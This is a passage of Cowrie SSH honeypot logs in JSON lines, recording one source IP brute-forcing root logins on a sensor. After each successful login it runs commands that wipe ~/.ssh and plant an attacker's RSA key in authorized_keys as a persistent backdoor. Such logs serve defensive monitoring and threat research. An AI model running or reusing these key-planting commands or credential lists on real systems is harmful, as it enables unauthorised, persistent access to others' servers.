-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:48:18.752052Z","src_ip":"212.227.235.229","session":"2955d1941c0c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:48:19.974743Z","src_ip":"212.227.235.229","session":"2955d1941c0c"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:48:21.284307Z","src_ip":"212.227.235.229","session":"2955d1941c0c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56958,"dst_ip":"1.2.3.4","dst_port":22,"session":"251bc7f3fa54","protocol":"ssh","message":"New connection: 212.227.235.229:56958 (1.2.3.4:22) [session: 251bc7f3fa54]","sensor":"my-vps","timestamp":"2025-08-28T15:48:21.605238Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:48:21.606134Z","src_ip":"212.227.235.229","session":"251bc7f3fa54"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:48:21.922949Z","src_ip":"212.227.235.229","session":"251bc7f3fa54"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:48:23.239087Z","src_ip":"212.227.235.229","session":"251bc7f3fa54"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:48:23.558092Z","src_ip":"212.227.235.229","session":"51b3a8022ce5"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:48:23.559203Z","src_ip":"212.227.235.229","session":"251bc7f3fa54"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40664,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3873426c27c","protocol":"ssh","message":"New connection: 212.227.235.229:40664 (1.2.3.4:22) [session: a3873426c27c]","sensor":"my-vps","timestamp":"2025-08-28T15:48:23.698654Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:48:23.699551Z","src_ip":"212.227.235.229","session":"a3873426c27c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:48:23.924136Z","src_ip":"212.227.235.229","session":"a3873426c27c"}
{"eventid":"cowrie.login.success","username":"root","password":"123mudar","message":"login attempt [root/123mudar] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:48:24.864566Z","src_ip":"212.227.235.229","session":"a3873426c27c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:48:25.330724Z","src_ip":"212.227.235.229","session":"a3873426c27c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:48:25.331398Z","src_ip":"212.227.235.229","session":"a3873426c27c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:48:25.332545Z","src_ip":"212.227.235.229","session":"a3873426c27c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:48:25.558746Z","src_ip":"212.227.235.229","session":"a3873426c27c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:48:26.064810Z","src_ip":"212.227.235.229","session":"a3873426c27c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:48:26.065726Z","src_ip":"212.227.235.229","session":"a3873426c27c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:48:26.292538Z","src_ip":"212.227.235.229","session":"a3873426c27c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:48:26.293488Z","src_ip":"212.227.235.229","session":"a3873426c27c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41918,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2b7d127db2c","protocol":"ssh","message":"New connection: 212.227.235.229:41918 (1.2.3.4:22) [session: e2b7d127db2c]","sensor":"my-vps","timestamp":"2025-08-28T15:48:26.547377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:48:26.548498Z","src_ip":"212.227.235.229","session":"e2b7d127db2c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:48:26.788501Z","src_ip":"212.227.235.229","session":"e2b7d127db2c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:48:27.790275Z","src_ip":"212.227.235.229","session":"e2b7d127db2c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:48:29.033206Z","src_ip":"212.227.235.229","session":"e2b7d127db2c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42816,"dst_ip":"1.2.3.4","dst_port":22,"session":"a48decf785b7","protocol":"ssh","message":"New connection: 212.227.235.229:42816 (1.2.3.4:22) [session: a48decf785b7]","sensor":"my-vps","timestamp":"2025-08-28T15:48:29.262455Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:48:29.263601Z","src_ip":"212.227.235.229","session":"a48decf785b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:48:29.493356Z","src_ip":"212.227.235.229","session":"a48decf785b7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:48:30.451644Z","src_ip":"212.227.235.229","session":"a48decf785b7"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:48:30.665542Z","src_ip":"212.227.235.229","session":"a3873426c27c"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:48:30.681972Z","src_ip":"212.227.235.229","session":"a48decf785b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60884,"dst_ip":"1.2.3.4","dst_port":22,"session":"232be9affa47","protocol":"ssh","message":"New connection: 212.227.235.229:60884 (1.2.3.4:22) [session: 232be9affa47]","sensor":"my-vps","timestamp":"2025-08-28T15:49:05.264465Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:49:05.265369Z","src_ip":"212.227.235.229","session":"232be9affa47"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:49:05.474251Z","src_ip":"212.227.235.229","session":"232be9affa47"}
{"eventid":"cowrie.login.failed","username":"liyang","password":"123456","message":"login attempt [liyang/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T15:49:06.344291Z","src_ip":"212.227.235.229","session":"232be9affa47"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:49:07.554549Z","src_ip":"212.227.235.229","session":"232be9affa47"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37720,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a1ae78dc88c","protocol":"ssh","message":"New connection: 212.227.235.229:37720 (1.2.3.4:22) [session: 3a1ae78dc88c]","sensor":"my-vps","timestamp":"2025-08-28T15:49:32.342839Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:49:32.343745Z","src_ip":"212.227.235.229","session":"3a1ae78dc88c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:49:32.574100Z","src_ip":"212.227.235.229","session":"3a1ae78dc88c"}
{"eventid":"cowrie.login.failed","username":"bot2","password":"bot2","message":"login attempt [bot2/bot2] failed","sensor":"my-vps","timestamp":"2025-08-28T15:49:33.535172Z","src_ip":"212.227.235.229","session":"3a1ae78dc88c"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:49:34.768553Z","src_ip":"212.227.235.229","session":"3a1ae78dc88c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57152,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb5d4273ab96","protocol":"ssh","message":"New connection: 212.227.235.229:57152 (1.2.3.4:22) [session: fb5d4273ab96]","sensor":"my-vps","timestamp":"2025-08-28T15:49:38.021211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:49:38.021917Z","src_ip":"212.227.235.229","session":"fb5d4273ab96"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:49:38.335789Z","src_ip":"212.227.235.229","session":"fb5d4273ab96"}
{"eventid":"cowrie.login.success","username":"root","password":"Wk123456.","message":"login attempt [root/Wk123456.] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:49:39.636394Z","src_ip":"212.227.235.229","session":"fb5d4273ab96"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:49:40.283009Z","src_ip":"212.227.235.229","session":"fb5d4273ab96"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:49:40.283767Z","src_ip":"212.227.235.229","session":"fb5d4273ab96"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:49:40.284676Z","src_ip":"212.227.235.229","session":"fb5d4273ab96"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:49:40.599818Z","src_ip":"212.227.235.229","session":"fb5d4273ab96"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:49:41.294856Z","src_ip":"212.227.235.229","session":"fb5d4273ab96"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:49:41.295866Z","src_ip":"212.227.235.229","session":"fb5d4273ab96"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:49:41.613080Z","src_ip":"212.227.235.229","session":"fb5d4273ab96"}
